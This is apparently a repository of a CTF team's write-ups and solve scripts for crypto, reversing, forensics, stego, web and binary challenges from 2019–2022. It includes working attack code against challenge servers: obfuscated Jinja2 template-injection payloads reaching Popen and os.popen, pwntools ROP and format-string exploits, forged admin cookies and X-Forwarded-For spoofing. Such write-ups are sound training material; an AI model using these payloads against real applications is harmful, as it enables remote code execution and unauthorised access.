├── 2019
    └── README.md
├── 2020
    ├── README.md
    ├── mrctf2020
    │   ├── rev
    │   │   └── README.md
    │   └── web
    │   │   └── README.md
    └── RACTF-2020
    │   ├── pwn
    │       └── README.md
    │   └── stego
    │       └── README.md
├── 2021
    ├── README.md
    └── 0x41414141
    │   └── crypto
    │       └── README.md
├── 2022
    ├── AkaSec-Local-CTF-2022
    │   ├── Forensics
    │   │   └── tobiya_irl
    │   │   │   └── readme.md
    │   ├── reversing
    │   │   └── classic
    │   │   │   ├── assets
    │   │   │       └── 1.png
    │   │   │   └── README.md
    │   ├── crypto
    │   │   └── Meganumerophobia
    │   │   │   ├── assets
    │   │   │       └── 1.png
    │   │   │   └── README.md
    │   └── web
    │   │   └── secret of konoha
    │   │       ├── assets
    │   │           ├── Screen_Shot_2022-10-21_at_1.00.03_PM.png
    │   │           ├── Screen_Shot_2022-10-21_at_12.39.47_PM.png
    │   │           └── Screen_Shot_2022-10-21_at_12.55.46_PM.png
    │   │       └── README.md
    ├── GDG-Algiers-CTF-2022
    │   ├── web
    │   │   ├── cookauth
    │   │   │   ├── README.md
    │   │   │   └── solve.py
    │   │   ├── ezphp
    │   │   │   └── README.md
    │   │   ├── pipe-your-way
    │   │   │   └── solve.py
    │   │   └── lay-lowah
    │   │   │   └── README.md
    │   ├── crypto
    │   │   └── eXORcist
    │   │   │   └── README.md
    │   └── rev
    │   │   └── solve.c
    ├── MetaRed
    │   └── crypto
    │   │   └── caxcan
    │   │       └── solve.py
    ├── K3RN3LCTF-2022
    │   ├── rev
    │   │   └── README.md
    │   └── forensics
    │   │   └── README.md
    ├── bcactf
    │   └── pwn
    │   │   ├── ROPJump
    │   │       └── exploit.py
    │   │   ├── Jump Rope
    │   │       └── exploit.py
    │   │   └── Format Fortune
    │   │       └── exploit.py
    └── Arab-Regional-Cybersecurity-CTF-2022
    │   └── web
    │       └── Strength-Calculator-2
    │           └── req
└── README.md


/2019/README.md:
--------------------------------------------------------------------------------
1 |  
2 | 


--------------------------------------------------------------------------------
/2020/README.md:
--------------------------------------------------------------------------------
1 |  
2 | 


--------------------------------------------------------------------------------
/2021/README.md:
--------------------------------------------------------------------------------
1 |  
2 | 


--------------------------------------------------------------------------------
/2022/AkaSec-Local-CTF-2022/Forensics/tobiya_irl/readme.md:
--------------------------------------------------------------------------------
1 | #Tobiya IRL
2 | 


--------------------------------------------------------------------------------
/2022/GDG-Algiers-CTF-2022/web/cookauth/README.md:
--------------------------------------------------------------------------------
1 | ## Writeup
2 | 
3 | [Solve script](./solve.py).
4 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Akasec's CTF Writeups
2 | 
3 | - [2019 writeups](./2019)
4 | - [2020 writeups](./2020)
5 | - [2021 writeups](./2021)
6 | - [2022 writeups](./2022)
7 | 


--------------------------------------------------------------------------------
/2022/AkaSec-Local-CTF-2022/reversing/classic/assets/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Akasec-1337/ctf-writeups/HEAD/2022/AkaSec-Local-CTF-2022/reversing/classic/assets/1.png


--------------------------------------------------------------------------------
/2022/AkaSec-Local-CTF-2022/crypto/Meganumerophobia/assets/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Akasec-1337/ctf-writeups/HEAD/2022/AkaSec-Local-CTF-2022/crypto/Meganumerophobia/assets/1.png


--------------------------------------------------------------------------------
/2022/AkaSec-Local-CTF-2022/web/secret of konoha/assets/Screen_Shot_2022-10-21_at_1.00.03_PM.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Akasec-1337/ctf-writeups/HEAD/2022/AkaSec-Local-CTF-2022/web/secret of konoha/assets/Screen_Shot_2022-10-21_at_1.00.03_PM.png


--------------------------------------------------------------------------------
/2022/AkaSec-Local-CTF-2022/web/secret of konoha/assets/Screen_Shot_2022-10-21_at_12.39.47_PM.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Akasec-1337/ctf-writeups/HEAD/2022/AkaSec-Local-CTF-2022/web/secret of konoha/assets/Screen_Shot_2022-10-21_at_12.39.47_PM.png


--------------------------------------------------------------------------------
/2022/AkaSec-Local-CTF-2022/web/secret of konoha/assets/Screen_Shot_2022-10-21_at_12.55.46_PM.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Akasec-1337/ctf-writeups/HEAD/2022/AkaSec-Local-CTF-2022/web/secret of konoha/assets/Screen_Shot_2022-10-21_at_12.55.46_PM.png


--------------------------------------------------------------------------------
/2022/GDG-Algiers-CTF-2022/web/cookauth/solve.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | from binascii import hexlify
 3 | 
 4 | URL = 'http://cookauth.chal.ctf.gdgalgiers.com/admin'
 5 | 
 6 | payload = '{"user": "admin"}'
 7 | 
 8 | resp = requests.get(url = URL, cookies = { '_info_user': hexlify(payload.encode()).decode() })
 9 | print(resp.text)
10 | 


--------------------------------------------------------------------------------
/2022/GDG-Algiers-CTF-2022/web/ezphp/README.md:
--------------------------------------------------------------------------------
1 | -PHP 5.3 doesn't handle HEAD requests correctly
2 | 
3 | -So the solution is to first send a HEAD request to /index.php
4 | 
5 | -It will set SESSION[admin] to 1 and stop before setting it back to 0
6 | 
7 | -Then send another GET request with the same session and you will get the flag
8 | 


--------------------------------------------------------------------------------
/2022/MetaRed/crypto/caxcan/solve.py:
--------------------------------------------------------------------------------
 1 | def roll(text):
 2 |     return text[::-1]
 3 | 
 4 | def swoop(text):
 5 |     text = list(text)
 6 |     for i in range(len(text)):
 7 |         if text[i] not in '{}':
 8 |             text[i] = chr(ord(text[i]) - (i % 6))
 9 |     return ''.join(text)
10 | 
11 | print(roll(swoop("}zudidsbybwxaqaqehxbebimt`jks{XNidpka")))
12 | 


--------------------------------------------------------------------------------
/2022/GDG-Algiers-CTF-2022/crypto/eXORcist/README.md:
--------------------------------------------------------------------------------
1 | The solution for the challenge is pretty simple, the server receives the text and place the flag randomly inside it, then generate a key and xor with the text.
2 | 
3 | The challenges is therefore vulnerable to the repeated key attack. The first step would be to get the key by sending a long text with known caracters, the result is xored with the sent text in order to get the key, and decrypt the flag part.
4 | 


--------------------------------------------------------------------------------
/2022/GDG-Algiers-CTF-2022/rev/solve.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | 
 3 | char pass[] = {0x15, 0x91, 0x2a, 0x59, 0x72, 0x1e, 0xd9, 0xa, 0xb6, 0xf1, 0x2a, 0xba, 0x5f, 0x66, 0x70, 0x61, 0x4f, 0xf7, 0xd1, 0x49, 0xd6, 0xac, 0xb4, 0x21, 0xb2, 0x1e, 0x94, 0x28, 0x5a, 0x57, 0xaa, 0x15, 0xc7, 0xa, 0xc8, 0xa3, 0xf0, 0x76, 3, 0x34, 0x88, 0xe1, 0x24, 0x63, 0xc2, 0x13, 0x5a};
 4 | 
 5 | int main(void){
 6 |     int i = 0;
 7 |     char clear;
 8 |     srand(0x7e6);
 9 |     for(i = 0; i < sizeof(pass); i++){
10 |         int k1 = rand();
11 |         int k2 = ((k1 >> 0x1f) >> 0x18);
12 |         clear = (pass[i] + k2) ^ (k1 + k2);
13 |         putchar(clear);
14 |     }
15 |     return 0;
16 | }
17 | 


--------------------------------------------------------------------------------
/2020/mrctf2020/rev/README.md:
--------------------------------------------------------------------------------
 1 | ## Xor (On-campus only)
 2 | 
 3 | XOR the data after XOR once to get the original data XOR the input character and serial number, and then compare it with the target array, so you only need to reverse the target array and XOR again to get the flag
 4 | 
 5 | ```c
 6 | #include<cstdio>
 7 | #include<cstring>
 8 | #include<cstdlib>
 9 | char flag[100]={0x4D,0x53,0x41,0x57,0x42,0x7E,0x46,0x58,0x5A,0x3A,0x4A,0x3A,0x60,0x74,0x51,0x4A,0x22,0x4E,0x40,0x20,0x62,0x70,0x64,0x64,0x7D,0x38,0x67};
10 | int main()
11 | {
12 | 	for(int i=0;i<strlen(flag);i++)
13 | 	{
14 | 		unsigned char tmp=flag[i];
15 | 		tmp^=i;
16 | 		printf("%c",tmp);
17 | 	}
18 | 	return 0;
19 | }
20 | ```
21 | 
22 | Get flag: MRCTF{@_R3@1ly_E2_R3verse!}
23 | 


--------------------------------------------------------------------------------
/2022/GDG-Algiers-CTF-2022/web/pipe-your-way/solve.py:
--------------------------------------------------------------------------------
1 | import requests
2 | 
3 | route = "follow_the_light"
4 | payload = '''
5 |     {% for x in (dict,"")|map("\x5c\x78\x36\x31ttr","\x5c\x78\x35\x66\x5c\x78\x35\x66\x5c\x78\x36\x32ase\x5c\x78\x35\x66\x5c\x78\x35\x66")|map("\x5c\x78\x36\x31ttr","\x5c\x78\x35\x66\x5c\x78\x35\x66subclasses\x5c\x78\x35\x66\x5c\x78\x35\x66")|first()() %}{% if "Popen" in (x,'')|map("\x5c\x78\x36\x31ttr","\x5c\x78\x35\x66\x5c\x78\x35\x66name\x5c\x78\x35\x66\x5c\x78\x35\x66")|first %}{{(x('cat flag\x5c\x78\x32\x65txt',shell=True,stdout=-1),"")|map("\x5c\x78\x36\x31ttr","communicate")|first()()}}{%endif%}{% endfor %}
6 | '''
7 | response = requests.get(f"http://pipe-your-way.chal.ctf.gdgalgiers.com/{route}?input="+payload)
8 | print(response.text)
9 | 


--------------------------------------------------------------------------------
/2022/K3RN3LCTF-2022/rev/README.md:
--------------------------------------------------------------------------------
 1 | ## WannaSwirl
 2 | 
 3 | Description : One of the office computers has been hit by a ransomware made by the k3rn3l4rmy hacking group!! We need to recover the flag from the hard drive otherwise the company will fail. Hopefully the malware has some issues. THIS IS LINUX MALWARE DO NOT RUN ON A MACHINE YOU CARE ABOUT.
 4 | 
 5 | 
 6 | Definition of a ransomware : A type of malicious software designed to block access to a computer system until a sum of money is paid.
 7 | 
 8 | 
 9 | Steps i did to solve the challenge:
10 | 	
11 | I looked at the given txt file and noticed that was a reversed text, so i searched the word "galf" means flag in reverse and i found all the flag in reverse
12 | 
13 | }3kup_4nn0g_m1_kn1ht_1_yzz1d_0s_gn1tt3g_m1_w0w{galf.
14 | 
15 | 
16 | flag{w0w_1m_g3tt1ng_s0_d1zzy_1_th1nk_1m_g0nn4_puk3}
17 | 


--------------------------------------------------------------------------------
/2022/bcactf/pwn/ROPJump/exploit.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | 
 3 | exe = context.binary = ELF('ROPjump')
 4 | 
 5 | def start(argv=[], *a, **kw):
 6 |     '''Start the exploit against the target.'''
 7 |     if args.GDB:
 8 |         return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
 9 |     else:
10 |         return process([exe.path] + argv, *a, **kw)
11 | 
12 | gdbscript = '''
13 | tbreak main
14 | continue
15 | '''.format(**locals())
16 | io = remote("bin.bcactf.com", 15694)
17 | 
18 | main = hex(exe.symbols['main'])+4
19 | bfnc = 0x4011d6+4
20 | gets_plt = exe.plt['gets']
21 | jumps = p64(0x40408c)
22 | 
23 | pop_rdi = p64(0x4013b3) # pop rdi
24 | ret = p64(0x4013b4) # ret
25 | f_234 = p64(0x3f9df3b6 )
26 | 
27 | payload = cyclic(120)
28 | payload += pop_rdi
29 | payload += jumps
30 | payload += p64(gets_plt)
31 | payload += p64(bfnc)
32 | 
33 | io.recvuntil('rt!')
34 | io.sendline(payload)
35 | io.recvuntil('it!')
36 | io.sendline(p64(f_234))
37 | io.interactive()
38 | 


--------------------------------------------------------------------------------
/2022/AkaSec-Local-CTF-2022/web/secret of konoha/README.md:
--------------------------------------------------------------------------------
 1 | # Web
 2 | 
 3 | # Secret of Konoha
 4 | 
 5 | This challenge was pretty straightforward, visiting the url you will be greeted with the following source code
 6 | 
 7 | ![Screen Shot 2022-10-21 at 12.39.47 PM.png](assets/Screen_Shot_2022-10-21_at_12.39.47_PM.png)
 8 | 
 9 | so the first it does is check how many  elements we have the `args` array, then it checks if any of the first two elements are `cat` (we can use `tac` , `head` or `tail` 😏).
10 | 
11 | Then it executes our whatever we passed in the `args` array.
12 | 
13 | Let’s try list the root directory :
14 | 
15 | ![Screen Shot 2022-10-21 at 12.55.46 PM.png](assets/Screen_Shot_2022-10-21_at_12.55.46_PM.png)
16 | 
17 | we can see a secret file, let’s check it’s content:
18 | 
19 | ![Screen Shot 2022-10-21 at 1.00.03 PM.png](assets/Screen_Shot_2022-10-21_at_1.00.03_PM.png)
20 | 
21 | Looks like a base64, decoding it will give us the flag
22 | 
23 | ```bash
24 | └─$ echo "QUtBU0VDe1czX2M0bl9EMF8xVH0=" | base64 -d
25 | AKASEC{W3_c4n_D0_1T}
26 | ```
27 | 


--------------------------------------------------------------------------------
/2022/K3RN3LCTF-2022/forensics/README.md:
--------------------------------------------------------------------------------
 1 | ## Zabomb
 2 | 
 3 | Description : You received a suspicious file from the k3rn3l4rmy hacking group, the title says ‘Not a Zip Bomb, Please Open’, you decide NOT to open it and instead try to reverse it. It is recommended that you do NOT open this, it will fill your entire disk.
 4 | 
 5 | First of all we google the definition of "zip bomb"
 6 | 
 7 | Definition : A zip bomb, also known as a decompression bomb or zip of death is a malicious archive file designed to crash or render useless the program or system reading it. It is often employed to disable antivirus software, in order to create an opening for more traditional malware.
 8 | 
 9 | Steps i did to solve the challenge :
10 | 
11 | 1. I uploaded the zip file in a vps.
12 | 	
13 | 2. Unzip it with "unzip -l" to list archive files.
14 | 	
15 | 3. look at the result.
16 | 	
17 | 4. unzip the file even if it will take a long time.
18 | 	
19 | 5. look at the strings unside the file with the smallest size between the 65k files unziped.
20 | 
21 | flag{w0w_c0mpres51on_&_d3comp53ssi0N_!s_s0_c3wl_ju5t_d0n7_gO_b0OM}
22 | 
23 | 


--------------------------------------------------------------------------------
/2022/AkaSec-Local-CTF-2022/reversing/classic/README.md:
--------------------------------------------------------------------------------
 1 | # classic
 2 | 
 3 | Download the challenges file, we are greeted with a flag file and 2 java classes
 4 | 
 5 | ```bash
 6 | ┌──(kali㉿cr1ngyk4li)-[~/dir]
 7 | └─$ ls -l
 8 | total 12
 9 | -rw-r--r-- 1 kali kali  405 Jun 12 02:51 classic.class
10 | -rw-r--r-- 1 kali kali  112 Jun 12 02:51 flag
11 | -rw-r--r-- 1 kali kali 1092 Jun 12 02:51 FlagEncrypt.class
12 | ```
13 | flag is obviously encrypted, let's check how by decompiling`FlagEncrypt.class` with jd-gui
14 | ![img](assets/1.png)
15 | 
16 | so the function `encrypt_flag` xor's each character of the flag with `0x4D` and append a space
17 | 
18 | ```java
19 | 	for (byte b = 0; b < paramString.length(); b++) {
20 | 			stringBuilder.append(paramString.charAt(b) ^ 0x4D);
21 | 			stringBuilder.append(' ');
22 |     	}
23 | ```
24 | Solving this is pretty simple, we take each element and xor it again with `0x4D`:
25 | 
26 | ```python
27 | with open("flag") as f:
28 |     l = str(f.readlines()[0])
29 |     lst = l.split(" ")
30 |     for i in lst:
31 |         print(chr(int(i) ^ 0x4d), end="")
32 |     print("\n")
33 | ```
34 | 
35 | Running it will give us the flag: `AKASEC{Hope_You_Learned_A_Thing_or_Two}`
36 | 


--------------------------------------------------------------------------------
/2022/bcactf/pwn/Jump Rope/exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python2
 2 | # -*- coding: utf-8 -*-
 3 | # This exploit template was generated via:
 4 | # $ pwn template jumprop
 5 | from pwn import *
 6 | 
 7 | # Set up pwntools for the correct architecture
 8 | exe = context.binary = ELF('jumprop')
 9 | 
10 | # Many built-in settings can be controlled on the command-line and show up
11 | # in "args".  For example, to dump all data sent/received, and disable ASLR
12 | # for all created processes...
13 | # ./exploit.py DEBUG NOASLR
14 | 
15 | 
16 | def start(argv=[], *a, **kw):
17 |     '''Start the exploit against the target.'''
18 |     if args.GDB:
19 |         return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
20 |     else:
21 |         return process([exe.path] + argv, *a, **kw)
22 | 
23 | # Specify your GDB script here for debugging
24 | # GDB will be launched if the exploit is run via e.g.
25 | # ./exploit.py GDB
26 | gdbscript = '''
27 | tbreak main
28 | continue
29 | '''.format(**locals())
30 | 
31 | #===========================================================
32 | #                    EXPLOIT GOES HERE
33 | #===========================================================
34 | # Arch:     amd64-64-little
35 | # RELRO:    Partial RELRO
36 | # Stack:    Canary found
37 | # NX:       NX enabled
38 | # PIE:      No PIE (0x400000)
39 | 
40 | io = remote('bin.bcactf.com', 49177) #start()
41 | rip = p64(0x4011bb)
42 | payload = cyclic(520)
43 | payload += rip
44 | io.recvuntil('jumping!')
45 | io.sendline(payload)
46 | print io.recvall()
47 | io.interactive()
48 | 


--------------------------------------------------------------------------------
/2022/bcactf/pwn/Format Fortune/exploit.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python2
 2 | # -*- coding: utf-8 -*-
 3 | # This exploit template was generated via:
 4 | # $ pwn template format-fortune
 5 | from pwn import *
 6 | 
 7 | # Set up pwntools for the correct architecture
 8 | exe = context.binary = ELF('format-fortune')
 9 | 
10 | # Many built-in settings can be controlled on the command-line and show up
11 | # in "args".  For example, to dump all data sent/received, and disable ASLR
12 | # for all created processes...
13 | # ./exploit.py DEBUG NOASLR
14 | 
15 | 
16 | def start(argv=[], *a, **kw):
17 |     '''Start the exploit against the target.'''
18 |     if args.GDB:
19 |         return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
20 |     else:
21 |         return process([exe.path] + argv, *a, **kw)
22 | 
23 | # Specify your GDB script here for debugging
24 | # GDB will be launched if the exploit is run via e.g.
25 | # ./exploit.py GDB
26 | gdbscript = '''
27 | tbreak main
28 | continue
29 | '''.format(**locals())
30 | 
31 | #===========================================================
32 | #                    EXPLOIT GOES HERE
33 | #===========================================================
34 | # Arch:     amd64-64-little
35 | # RELRO:    Partial RELRO
36 | # Stack:    Canary found
37 | # NX:       NX enabled
38 | # PIE:      No PIE (0x400000)
39 | 
40 | io = remote('bin.bcactf.com', 49175) #start()
41 | MAGIC = exe.sym['magic']
42 | payload = fmtstr_payload(6, {MAGIC: 0xbeef})
43 | io.recvuntil('name?')
44 | io.sendline(payload)
45 | print io.recvall
46 | io.interactive()
47 | 


--------------------------------------------------------------------------------
/2022/Arab-Regional-Cybersecurity-CTF-2022/web/Strength-Calculator-2/req:
--------------------------------------------------------------------------------
 1 | POST /?a=application&b=__globals__&c=__builtins__&d=__import__&e=os&f=popen&g=id&i=read HTTP/1.1
 2 | Host: wcomxj6zqp9t639y4nzyr42tn3km1xvk2074clz0-web.cybertalentslabs.com
 3 | Content-Length: 717
 4 | Cache-Control: max-age=0
 5 | Upgrade-Insecure-Requests: 1
 6 | Origin: http://wcomxj6zqp9t639y4nzyr42tn3km1xvk2074clz0-web.cybertalentslabs.com
 7 | Content-Type: application/x-www-form-urlencoded
 8 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
 9 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
10 | Referer: http://wcomxj6zqp9t639y4nzyr42tn3km1xvk2074clz0-web.cybertalentslabs.com/
11 | Accept-Encoding: gzip, deflate
12 | Accept-Language: en-US,en;q=0.9
13 | Connection: close
14 | 
15 | name=%7B%25%20if%20%28request%7Cattr%28request%7Cattr%28%27args%27%29%7Cattr%28%27get%27%29%28%27a%27%29%29%7Cattr%28request%7Cattr%28%27args%27%29%7Cattr%28%27get%27%29%28%27b%27%29%29%7Cattr%28%27get%27%29%28request%7Cattr%28%27args%27%29%7Cattr%28%27get%27%29%28%27c%27%29%29%7Cattr%28%27get%27%29%28request%7Cattr%28%27args%27%29%7Cattr%28%27get%27%29%28%27d%27%29%29%29%28request%7Cattr%28%27args%27%29%7Cattr%28%27get%27%29%28%27e%27%29%29%7Cattr%28request%7Cattr%28%27args%27%29%7Cattr%28%27get%27%29%28%27f%27%29%29%28request%7Cattr%28%27args%27%29%7Cattr%28%27get%27%29%28%27g%27%29%29%7Cattr%28request%7Cattr%28%27args%27%29%7Cattr%28%27get%27%29%28%27i%27%29%29%28%29%20%25%7D%20a%20%7B%25%20endif%20%25%7D
16 | 


--------------------------------------------------------------------------------
/2022/AkaSec-Local-CTF-2022/crypto/Meganumerophobia/README.md:
--------------------------------------------------------------------------------
 1 | # Meganumerophobia
 2 | 
 3 | N = 123536064164139504718275064269913509942218319347640973269872257382194760838729086261914280412305602133850510043881523444330171567517820066827513095775693034489202078955981042875624061355151848686073635461915867708508827192798870018423289686855770187991093844972451881756937570076069209140735021093628404629683
 4 | 
 5 | E = 92370846707748897500296351665818073398586454136545714500109133235541482744024550126156073549534699178879840146525944763829999796895084166100935176345214466820330114013766743408230087643320164150699132430112387071160308101557300570496099251514906798335785688872418279466203772084569302164740651911244453869567
 6 | 
 7 | c = 18558348214847512573294588511266840380348405132842531472553850711388470657627464594921088830162510169049111893584325573658059621310419495034734959331066927106667055290456052616736656675124261379322618015210674889106071447600463640756792023778923840933422853879463970630072574489632844747555059602937877225343
 8 | 
 9 | 
10 | Clairement c'est RSA, avec un trés grand exposant. Ce genre d'exposant est vulnérable a l'attaque de Wiener si l'exposant privé est faible.
11 | Il n'y a qu'un seul moyen de s'en assurer:
12 | 
13 | J'ai essayé RsaCtfTool mais il m'a pris beaucoup de temp, J'ai trouvé ces scripts après avoir recherché un autre moyen: [continued_fractions](https://gist.github.com/mananpal1997/73d07cdc91d58b4eb5c818aaab2d38bd). on change les valeurs N, E et C et on lance le script:
14 | ```
15 | ┌──(kali㉿cr1ngyk4li)-[~/Rsa/]
16 | └─$ python2 rsa_2.py
17 | 00000010010000010001001000001000001000000001001101011000010000011100001000100000
18 | ```
19 | Premier coup d'oeil a l'output j'ai pensé que ça était en binaire mais apparemment c'est du Bacon Cipher.
20 | 
21 | ![img](assets/1.png)
22 | 
23 | 
24 | FLAG : AKASEC{BACONEDRSA}
25 | 
26 | 
27 | 
28 | 


--------------------------------------------------------------------------------
/2020/RACTF-2020/pwn/README.md:
--------------------------------------------------------------------------------
 1 | ## pearl pearl pearl
 2 | 
 3 | pearlpearlpearlpearlpearlpearlpearlpearlpearlpearlpearlpearlpearlpearlpearl
 4 | 
 5 | **ractf{p34r1_1ns1d3_4_cl4m}**
 6 | 
 7 | **Solution:** When we connect to server we are given a weird stream of data that contain ctf{pearlpearlpearl}.
 8 | 
 9 | After longue research on it, a message was hidden by using a carriage return symbol so when you are connected to the server and the output is printed to the terminal you can't see the message as the symbol makes the terminal overwrite the data in the line, but if you check the actual data printed by the server you can see the message.
10 | So, I wrote a short script which connects to the server, reads the data and prints it to the screen without special symbols taking effect (and most importantly carriage return), but it didnt work, it's seems that even though there are a lot of carriage return symbols in the data there aren't any hidden messages.
11 | 
12 | With that in mind, I wrote a short script which creates a empty string, reads until an end of a false flag and check if the symbol afterwards is new line or carriage return and append 0 or 1 to the string accordinaly, in the end it encodes the binary string to ascii characters and prints them:
13 | 
14 | ```python 3
15 | from pwn import remote
16 | import binascii
17 | host = "88.198.219.20"
18 | port = 22324
19 | s = remote(host, port)
20 | flag = ''
21 | try:
22 |     while 1:
23 |         s.recvuntil("}")
24 |         end = str(s.recv(1))
25 |         if 'r' in end:
26 |             flag += '0'
27 |         else:
28 |             flag += '1'
29 | except EOFError:
30 |     print(''.join([chr(int(flag[i:i + 8], 2)) for i in range(0, len(flag), 8)]))
31 | ```
32 | and I got the flag:
33 | 
34 | ractf{p34r1_1ns1d3_4_cl4m}
35 | 
36 | **Resources:**
37 | * Writeup for clam clam clam challenge from AngstromCTF 2020: https://ctftime.org/writeup/18869
38 | 


--------------------------------------------------------------------------------
/2020/mrctf2020/web/README.md:
--------------------------------------------------------------------------------
 1 | ## PYWebsite
 2 | 
 3 | A simple front-end trick question, I hope more people will notice that front-end verification is insecure.
 4 | 
 5 | The first step is to go through the business logic, which is the process of purchasing the authorization code and then verifying the authorization code. The loopholes in the audit verification process naturally come to mind. Click the button to pop up the window is controlled by js, and then guess the verification logic is in the front end, so look at the source code and find the logic as follows:
 6 | 
 7 | 
 8 | Don't know about MD5? In fact, we don't need to care about the front-end verification at all, we just need to jump directly to flag.php. (md5("ARandomString"))
 9 | 
10 | Enter flag.php, the title tells us that only a specific IP can be accessed, and it is a back-end verification. In fact, it doesn't make sense for the application layer to use XFF to verify IP. PHP uses the X-Forward-For http request header to verify, and this request header we can forge.
11 | 
12 | We don't know the buyer's IP, but we know the "own" IP, which is the local loopback address 127.0.0.1. Therefore, you only need to use the packet capture software to capture the HTTP request packet and modify it (add X-Forwarded-For: 127.0.0.1a line) to deceive the verification logic. The last flag font I changed to white hhh, so we need to observe the verification logic of the source code backend as follows:
13 | 
14 | ```python
15 | function checkXFF() {
16 |   if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
17 |     $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
18 |     if (strpos($ip, "127.0.0.1") !== false) {
19 |       return true;
20 |     }
21 |   }
22 |   return false;
23 | }
24 | ```
25 | 
26 | By the way, how to verify the real IP of the user? It's really not easy to do. Because users may use a proxy (called a forward proxy), our server will also perform forwarding operations such as load balancing (called a reverse proxy) due to business requirements. But if this process is not through a proxy, generally using Remote_Addr can get the real IP. flag:MRCTF{Ba1_Pia0_Flag_1s_ve7y_H4PPY!}
27 | 
28 | 
29 | 


--------------------------------------------------------------------------------
/2021/0x41414141/crypto/README.md:
--------------------------------------------------------------------------------
 1 | # eazy RSA (445)
 2 | > c = 3708354049649318175189820619077599798890688075815858391284996256924308912935262733471980964003143534200740113874286537588889431819703343015872364443921848 <br>
 3 | > e = 16 <br>
 4 | > p = 75000325607193724293694446403116223058337764961074929316352803137087536131383 <br>
 5 | > q = 69376057129404174647351914434400429820318738947745593069596264646867332546443 <br>
 6 | 
 7 | ## Solution
 8 | ```sage
 9 | ZeroDivisionError: inverse of Mod(16, 5203226874048586660123187369475542584442690830335849146139399959453354953924976900388993415470710574187687844214029203747760116730703556445063231528642844) does not exist
10 | ```
11 | [Rabin cryptosystem](https://en.wikipedia.org/wiki/Rabin_cryptosystem) and as Wiki says
12 | 
13 | *The message **m** can be recovered from the ciphertext **c** by taking its square root modulo n as follows.*
14 | 
15 | In this case we can recover **m** by repeatedly taking ciphertext's (c) square root modulo n as follows,
16 | 
17 | ```py
18 | from Crypto.Util.number import *
19 | 
20 | def egcd(a, b):
21 |     x,y, u,v = 0,1, 1,0
22 |     while a != 0:
23 |         q, r = b//a, b%a
24 |         m, n = x-u*q, y-v*q
25 |         b,a, x,y, u,v = a,r, u,v, m,n
26 |     gcd = b
27 |     return gcd, x, y
28 | 
29 | def decrypt(c):
30 |     mp = pow(c, (p+1)//4, p)
31 |     mq = pow(c, (q+1)//4, q)
32 |     r1 = (yp*p*mq + yq*q*mp) % n
33 |     r2 = n-r1 
34 |     r3 = (yp*p*mq - yq*q*mp) % n
35 |     r4 = n-r3
36 |     return (r1,r2,r3,r4)
37 | 
38 | 
39 | c = [3708354049649318175189820619077599798890688075815858391284996256924308912935262733471980964003143534200740113874286537588889431819703343015872364443921848]
40 | p = 75000325607193724293694446403116223058337764961074929316352803137087536131383
41 | q = 69376057129404174647351914434400429820318738947745593069596264646867332546443
42 | n = p*q
43 | 
44 | # Rabin's test
45 | assert p % 4 == 3
46 | assert q % 4 == 3
47 | 
48 | _, yp, yq = egcd(p,q)
49 | # print(yp,yq)
50 | 
51 | for i in range(4):
52 |     pts = []
53 |     for ct in c:
54 |         pts += decrypt(ct)
55 |     c = pts
56 | for m in c:
57 |     dec = long_to_bytes(m)
58 |     if b'flag' in dec:
59 |         print(dec)
60 | 
61 | # flag{d0nt_h4v3_4n_3v3n_3_175_34sy!!!}
62 | ```
63 | 


--------------------------------------------------------------------------------
/2020/RACTF-2020/stego/README.md:
--------------------------------------------------------------------------------
 1 | ## Mad CTF Disease
 2 | Todo:\
 3 | [x] Be a cow\
 4 | [x] Eat grass\
 5 | [x] Eat grass\
 6 | [x] Eat grass\
 7 | [ ] Find the flag
 8 | 
 9 | **ractf{exp3rt-mo0neuv3r5}**
10 | 
11 | **Solution:**
12 | 
13 | <p align="center">
14 |   <img src="https://cdn.discordapp.com/attachments/635278809741918218/1033552660957237338/unknown.png">
15 | </p>
16 | 
17 | First thing I do when faced with images is to check strings, and also i use binwalk to check if there are any embedded files in the images, as expected binwalk finds nothing in this image, afterwards I check using steghide also for embedded files, It supposed to do a better job but I mostly use it by habit because binwalk almost always finds the same files.
18 | 
19 | After using steghide we manage to extract a file if we take a look at the file steghide found we see a really bizzare text constructed only by moo's:
20 | 
21 | ```
22 | OOOMoOMoOMoOMoOMoOMoOMoOMoOMMMmoOMMMMMMmoOMMMMOOMOomOoMoOmoOmoomOo
23 | MMMmoOMMMMMMmoOMMMMOOMOomOoMoOmoOmoomOoMMMmoOMMMMMMmoOMMMMOOMOomOo
24 | MoOmoOmooOOOmoOOOOmOomOoMMMmoOMMMMOOMOomoOMoOmOomoomOomOoMMMmoOmoO
25 | MMMMOOMOomoOMoOmOomoomOomOomOoMMMmoOmoOmoOMMMMOOMOomoOMoOmOomoomoO
26 | MoOMoOMoomOoOOOmoOOOOmOomOoMMMmoOMMMMOOMOomoOMoOmOomoomOomOoMMMmoO
27 | moOMMMMOOMOomoOMoOmOomoomoOMoOMoomOoOOOmoOOOOmOomOoMMMmoOMMMMOOMOo
28 | moOMoOmOomoomOomOoMMMmoOmoOMMMMOOMOomoOMoOmOomoomoOMoOMoOMoOMoomOo
29 | OOOmoOOOOmOomOoMMMmoOMMMMOOMOomoOMoOmOomoomOomOoMMMmoOmoOMMMMOOMOo
30 | moOMoOmOomoomOomOomOoMMMmoOmoOmoOMMMMOOMOomoOMoOmOomoomoOMoOMoOMoO
